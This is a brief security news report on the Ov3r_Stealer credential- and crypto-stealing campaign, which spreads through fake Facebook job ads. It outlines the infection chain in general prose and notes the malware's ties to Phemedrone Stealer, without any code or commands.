Threat actors have initiated a campaign using deceptive Facebook job advertisements to propagate a new Windows-based malware named Ov3r_Stealer. This malicious software, as identified by Trustwave SpiderLabs, specializes in extracting credentials and cryptocurrency wallets, forwarding the data to a monitored Telegram channel. Capable of pilfering an array of sensitive information including IP addresses, passwords, credit card details, and Microsoft Office documents, Ov3r_Stealer poses a significant threat to unsuspecting users.
The attack methodology commences with a weaponized PDF file, presented as a OneDrive document, luring users to click on a concealed “Access Document” button. Subsequently, users are directed to an internet shortcut (.URL) file masquerading as a DocuSign document hosted on Discord’s content delivery network. Upon execution, the .URL file initiates the delivery of a control panel item (.CPL) file, which is executed using the Windows Control Panel process binary (“control.exe”). This execution path culminates in the launch of Ov3r_Stealer via a PowerShell loader retrieved from a GitHub repository.
Notably, the campaign bears striking similarities to a previous attack detailed by Trend Micro, involving another stealer known as Phemedrone Stealer. Both malware variants share code-level overlaps and leverage similar infection chains, hinting at potential rebranding or repurposing by threat actors. Additionally, the cybercriminal behind Ov3r_Stealer has been observed promoting their malware on Telegram channels, aiming to establish credibility within the malware-as-a-service (MaaS) landscape. These findings underscore the growing sophistication and diversification of cyber threats, necessitating enhanced vigilance and proactive security measures among organizations and individuals alike.